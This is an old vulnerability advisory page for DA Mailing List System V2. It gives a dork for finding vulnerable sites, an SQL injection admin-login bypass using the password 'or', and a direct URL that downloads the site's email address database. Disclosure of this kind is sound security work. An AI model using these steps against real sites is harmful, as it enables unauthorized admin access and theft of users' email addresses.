DA Mailing List 2 remote SQL injection and database disclosure

2010-02-09 / 2010-02-10
Credit: Phenom
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################################################################### # # ### DA Mailing List System V2 Remote Admin Login Exploit ### # # ####################################################################### # # # Author : Phenom # # # # Dork: DA Mailing List System V2 Powered by DigitalArakan.Net # # # # Version : 2 # # # ####################################################################### # # # Exploit : # # # # 1- http://server/path/admin_cp.asp # # # # 2- login with "admin" as user name and 'or' as password # # # ####################################################################### ####################################################################### # # ### DA Mailing List System V2 Download files vulnerability ### # # ####################################################################### # # # Author : Phenom # # # # Dork: DA Mailing List System V2 Powered by DigitalArakan.Net # # # # Version : 2 # # # ####################################################################### # # # # Exploit : # # # # # http://server/path/db/email_addresses.mdb # # # #######################################################################


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top